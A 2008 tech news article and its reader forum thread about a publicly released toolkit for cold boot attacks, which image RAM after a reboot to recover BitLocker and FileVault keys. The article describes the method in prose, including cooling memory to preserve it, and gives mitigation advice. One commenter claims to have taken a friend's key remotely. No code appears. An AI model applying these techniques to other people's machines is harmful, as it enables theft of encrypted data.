Toolkit breaks FileVault and BitLocker

Toolkit breaks FileVault and BitLocker

Co-authors Seth Schoen and Jacob Appelbaum wrote the code that allows encryption keys to be snagged.

If you rely on encryption technology like Microsoft's BitLocker or Apple's FileVault, you might want to think again: a team of security researchers has released a toolkit allowing popular cryptography packages to be bypassed.

Part of the Memory Research Project at Princeton University, the tools – released in source code form suitable to use on pretty much any architecture of PC once compiled – is an implementation of the techniques uncovered during research into so-called 'cold boot' attacks against cryptographic systems as part of a paper published by the team.

CNet has it that attackers are able to use the code provided to reboot a running system, image the memory to a USB key or via network booting, and extract AES and RSA private keys automatically – even if that particular section of memory has degraded during the reboot.

If true, cryptosystems which keep the key in memory even after it is no longer required are at risk – and that includes the two most popular encryption packages, the shipped-by-default BitLocker that comes with Windows Vista Ultimate and FileVault which comes with MacOS X.

Although data stored in memory degrades when the power is cut, the team discovered that it doesn't disappear as fast as previously thought. Testing with an image stored in memory, the team were able to recover enough data to recreate a recognisable version of the image for almost a minute after power had been removed from the module. By cooling the memory using the compressed gas in a commercially-available 'spray duster' can the team were able to extend this period to several minutes, and by submerging the module in liquid nitrogen this was extended to a period of hours.

This period in which memory retains data stored before power was cut is where the software works: by quickly rebooting the machine and imaging the memory, a program is used to search through the image for AES and RSA private keys that can be used to decode the target files. An additional utility is also available for repairing damage caused to these keys if you didn't get the memory imaged fast enough.

While the research has been reported before, this marks the first occasion that the team has released source code allowing even the relatively untechnical access to the techniques detailed by the team. While it's a blow for people who rely on cryptography to keep their private data private, it's important to note that the attack is hardly subtle – in order to use the programs created by the team an attacker would require local access to the machine, and a reboot is required. It's not something a remote attacker could reasonably achieve, even allowing for the possibility of Netboot code. If in doubt, I'd recommend that you unmount your encrypted drives when they're not in use – and if your data is really private, reboot your system afterwards.

Anybody here fancy compiling the code and seeing if they can break their FileVault or BitLocker encryption, or do we all have nothing to hide? Share your thoughts over in the forums.


Discuss in the forums Reply
Da Dego 22nd July 2008, 14:19 Quote
I'm not sure how I feel about this. I mean, I don't care that the source code is released and obviously the exploit has been around since we last reported on it. The question is whether it's truly notable.

At some point, there's a hardware flaw and that can't be helped - we're talking about needing genuine local access to the machine, PLUS reboot ability, plus some type of bootable media ability. And all of this goes back to that encryption is as good as the user's technique in utilizing it, which should include unmounting encrypted drives when you're done using them (as Gareth mentions).

The only computers that have a lot to fear from this, then, are laptops which can be stolen before you've unmounted your secure partition. And in that case, were your data THAT sensitive, you could be using something like Seagate's Momentus FDE (full disk encryption) drive or the Silverstone encrypting enclosure. Neither of these should leave a key in your RAM.

So I guess it's good to point out the weakness, but it's important to realize that there's just no perfect system. A little common-sense from a user perspective turns this into a non-issue, and more of an academic finding as to the weakness of RAM technology.
cjmUK 22nd July 2008, 14:43 Quote
I think the point is, for most people, BitLocker et al are fine, but if you are one of the countries top spies, you can choose different tools or modify your behaviour and you are still relatively safe.

Currently, I'm more concerned that the government give away my entire digital identity on weekly basis by posting CDs to strangers, than I am about a determined infiltrator gaining physical access to my encrypted PC.
Tomm 22nd July 2008, 17:35 Quote
I wonder if either of those guys has ever touched a girl.
theevilelephant 22nd July 2008, 17:50 Quote
Originally Posted by Tomm
I wonder if either of those guys has ever touched a girl.

does their mother count?

but seriously as mentioned before, you would have to have something really important for someone to bother going to these lengths to get the data. and if it was that important methinks you would use something other than bitlocker
Buzzons 22nd July 2008, 23:56 Quote

full whitepaper on it...

and yea it worked to snag a truecrypt password.
knyghtryda 23rd July 2008, 02:00 Quote
this may not seem like a big deal for most people (and it isn't) but say you had a corporate/government environment and you wanted encryption keys for a project, which happen to be sitting on an somebody's computer. All you'd have to do is plug in, reboot the machine, grab the keys (assuming no bios password was set) and leave, letting the machine finish booting. Think about it... this could be done in a span of minutes, which is plenty of time if say the entire floor is out for lunch. Kinda scary stuff..
p3ri0d 23rd July 2008, 02:45 Quote
Yeah, real scary.

I knew it was possible but no pub tool was out for it, only papers.
cjmUK 23rd July 2008, 10:13 Quote
Originally Posted by Buzzons

and yea it worked to snag a truecrypt password.

Only works when the user doesn't expressly close the encrypted file/volume in true crypt.

When you close the volume, truecrypt overwrites any passwords & keys in memory.

They've already put a statement out to this effect in the last couple of weeks.
p3ri0d 23rd July 2008, 14:25 Quote
Originally Posted by cjmUK
Only works when the user doesn't expressly close the encrypted file/volume in true crypt.

When you close the volume, truecrypt overwrites any passwords & keys in memory.

They've already put a statement out to this effect in the last couple of weeks.

You are forgetting that you can encrypt a whole windows system partition with TrueCrypt.

P.S: I think Ubuntu fixed that bug as of 8.04. Not sure though.
Bluephoenix 24th July 2008, 05:37 Quote
one interesting thing is that if a PC is networked and you use the appropriate code, you can use the same trick but pull the right data from right over the network if a machine has wake on lan enabled (and that can be changed through other methods)

I've tried it in a lab setup here and it works, I was able to snag a friend's key from his laptop while he was connected to the network, and I was 3 buildings away.
Log in

You are not logged in, please login with your forum account below. If you don't already have an account please register to start contributing.

Discuss in the forums